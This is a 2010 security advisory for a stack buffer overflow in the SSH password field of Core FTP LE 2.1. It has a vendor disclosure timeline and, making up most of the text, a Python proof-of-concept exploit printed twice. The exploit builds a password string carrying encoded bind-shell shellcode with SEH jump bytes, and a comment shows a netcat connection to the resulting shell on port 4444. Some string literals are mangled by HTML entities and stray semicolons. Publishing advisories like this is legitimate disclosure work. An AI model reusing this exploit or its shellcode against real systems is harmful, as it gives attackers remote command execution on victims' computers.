Security

  Text :  


Advisory : CORELAN-10-007
Disclosure date : 2nd Feb 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : Coreftp LE
[*] Version : 2.1
[*] Vendor : ServersMan
[*] URL : http://www.coreftp.com/
[*] Platform : Windows XP SP3
[*] Type of vulnerability : Local Stack buffer overflow
[*] Risk rating : Low
[*] Issue fixed in version : No
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT,
sinn3r & Jacky from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

Now you can download Core FTP LE - free Windows software that includes the
client FTP features you need. Features like SFTP (SSH), SSL, TLS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support, custom
commands, FTP URL parsing, command line transfers, filters, and much, much
more!

This free, secure FTP client gives you a fast, easy, reliable way to update
and maintain your website via FTP. It also provides a secure method (via
SSL, TLS, or SFTP) to upload / download files to and from FTP servers.
Check out the list of features and you'll find almost every feature you
need, all in a free ftp program. There are no popup ads, advertising or
spyware and you're never asked or reminded to register.


0x02 : Vulnerability details
----------------------------
The vulnerability can be triggered by convincing a user to submit an overly
long String for the SSH password. The buffer is unchecked,
resulting in control of the instruction pointer, allowing for arbitrary
code injection.




0x03 : Vendor communication
---------------------------
[*] January 17, 2010 - Initial disclosure to the vendor
[*] January 20, 2010 - Vendor reminded about vulnerability
[*] January 21, 2010 - Vendor replied and acknowledged the vulnerability
[*] January 21, 2010 - Requested patch date
[*] January 30, 2010 - reminded vendor of releasing a patch date
[*] February 2, 2010 - No contact or response from vendor
[*] February 2, 2010 - Public disclosure

0x04 : Exploit/PoC
------------------
#!/usr/bin/python
#
#
#
print
"|------------------------------------------------------------------|&
quot;
print "| __ __
|"
print "| _________ ________ / /___ _____ / /____ ____ _____
___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __
`__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / /
/ / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/
/_/ |"
print "|
|"
print "|
http://www.corelan.be:8800 |"
print "|
security@corelan.be |"
print "|
|"
print "|-------------------------------------------------[ EIP Hunters
]--|"
print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF
exploit"

sc =
("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49&quo
t;
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
;
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
;
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
;
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
;
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
;
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
;
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
;
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
;
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
;
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
;
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
;
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
;
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
;
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
;
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
;
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
;
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
;
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
;
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
;
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
;
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
;
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
;
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
;
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
;
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
;
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
;
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
;
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
;
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
;
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
;
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
;
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
;
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
;
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
;
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
;
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
;
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
;
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
;
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
;
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
;
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
;
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
;
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
;
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");

print "[+] Creating buffer string in overflowpassword.txt."

stuff = "\x41" * 145
stuff += "\x90" * 5
stuff += sc
stuff += "\x41" * (1008-len(stuff)-5)
stuff += "\xe9\x7c\xfc\xff\xff" # Lets fly
stuff += "\xeb\xf9\x90\x90" # Jump back
stuff += "\x0b\x0b\x27\x00" # partial/null overwrite

f1 = open('overflowpassword.txt','w');
f1.write(stuff);
f1.close();


#!/usr/bin/python
#
# Vulnerability : CoreFTP v2.1 b1637 (password field) Universal BOF
exploit
# Found by : mr_me (seeleymagic [at] hotmail [dot] com)
# Coded by : mr_me & corelanc0d3r
# Download from : http://www.coreftp.com/download.html
# Tested on : XP SP3 En (VirtualBox)
# Greetz to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT,
sinn3r & Jacky from Corelan Team
# Advisory :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-0
07-coreftp-password-field-stack-buffer-overflow/
#
# Thanks to Dr_IDE for pointing me to this app :)
# Notes: This app was compiled with safeSEH, so a call dword did the trick
;)
# If you manage to convince a user to input a 6000 length string as a
password
# then they deserve to be owned...! ;)
#
# Usage: Quick connect --> Advanced --> SSH --> password -->
bind shell ;)
#
# mrme@backtrack:~$ nc -v 192.168.2.9 4444
# 192.168.2.9: inverse host lookup failed: Unknown server error :
# Connection timed out
# (UNKNOWN) [192.168.2.9] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\PROGRA~1\CoreFTP>
#

print
"|------------------------------------------------------------------|&
quot;
print "| __ __
|"
print "| _________ ________ / /___ _____ / /____ ____ _____
___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __
`__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / /
/ / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/
/_/ |"
print "|
|"
print "|
http://www.corelan.be:8800 |"
print "|
security@corelan.be |"
print "|
|"
print "|-------------------------------------------------[ EIP Hunters
]--|"
print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF
exploit"

sc =
("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49&quo
t;
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
;
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
;
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
;
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
;
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
;
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
;
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
;
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
;
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
;
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
;
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
;
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
;
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
;
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
;
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
;
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
;
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
;
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
;
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
;
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
;
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
;
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
;
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
;
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
;
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
;
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
;
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
;
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
;
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
;
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
;
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
;
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
;
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
;
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
;
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
;
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
;
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
;
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
;
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
;
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
;
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
;
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
;
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
;
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");

print "[+] Creating evil buffer string in overflowpassword.txt,
ph33r"

stuff = "\x41" * 145
stuff += "\x90" * 5
stuff += sc
stuff += "\x41" * (1008-len(stuff)-5)
stuff += "\xe9\x7c\xfc\xff\xff" # Lets fly
stuff += "\xeb\xf9\x90\x90" # Jump back
stuff += "\x0b\x0b\x27\x00" # partial/null overwrite

pwn = open('overflowpassword.txt','w');
pwn.write(stuff);
pwn.close();